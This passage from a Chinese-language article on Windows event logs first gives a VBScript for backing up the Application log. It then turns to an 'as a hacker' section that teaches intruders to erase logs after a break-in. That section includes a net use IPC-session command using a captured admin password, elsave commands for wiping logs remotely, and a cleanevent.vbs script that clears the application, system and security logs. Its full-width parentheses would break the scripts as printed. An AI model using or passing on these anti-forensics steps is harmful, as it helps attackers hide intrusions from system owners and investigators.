下面给出备份application日志的代码：

backuplog.vbs
strComputer = "."
Set objWMIService = GetObject（"winmgmts:" _
& "{impersonationLevel=impersonate,（Backup）}!\\" & _
strComputer & "\root\cimv2"） '获得 VMI对象
Set colLogFiles = objWMIService.ExecQuery _
（"Select * from Win32_NTEventLogFile where LogFileName='Application'"） '获取日志对象中的应用程序日志
For Each objLogfile in colLogFiles
errBackupLog = objLogFile.BackupEventLog（"f:\application.evt"） '将日志备份为f:\application.evt
If errBackupLog <> 0 Then
Wscript.Echo "The Application event log could not be backed up."
else Wscript.Echo "success backup log"
End If
Next

　　程序说明：如果备份成功将窗口提示："success backup log" 否则提示："The Application event log could not be backed up",此处备份的日志为application 备份位置为f:\application.evt,可以自行修改，此处备份的格式为evt的原始格式，用记事本打开则为乱码，这一点他不如dumpel用得方便。

　　三：作为黑客

　　1、日至清除

　　一个入侵系统成功后的黑客第一件事便是清除日志，如果以图形界面远程控制对方机器或是从终端登陆进入，删除日志不是一件困难的事，由于日志虽然也是作为一种服务运行，但不同于http,ftp这样的服务，可以在命令行下先停止，再删除，在m命令行下用net stop eventlog是不能停止的，所以有人认为在命令行下删除日志是很困难的，实际上不是这样，下面介绍几种方法:

　　（1）借助第三方工具：如小榕的elsave.exe远程清除system,applicaton,security的软件，使用方法很简单，首先利用获得的管理员账号与对方建立ipc会话，net use \\ip pass /user: user
然后命令行下：elsave -s \\ip -l application -C，这样就删除了安全日志。

　　其实利用这个软件还可以进行备份日志，只要加一个参数 -f filename就可以了，在此不再详述。

　　（2）利用脚本编程中的VMI，也可以实现删除日志，首先获得object对象，然后利用其clearEventLog（）方法删除日志。源代码：

cleanevent.vbs
strComputer = "."
Set objWMIService = GetObject（"winmgmts:" _
& "{impersonationLevel=impersonate,（Backup）}!\\" & _
strComputer & "\root\cimv2"）
dim mylogs（3）
mylogs（1）="application"
mylogs（2）="system"
mylogs（3）="security"
for Each logs in mylogs
Set colLogFiles = objWMIService.ExecQuery _
（"Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'"）
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog（）
Next
next

相关搜索：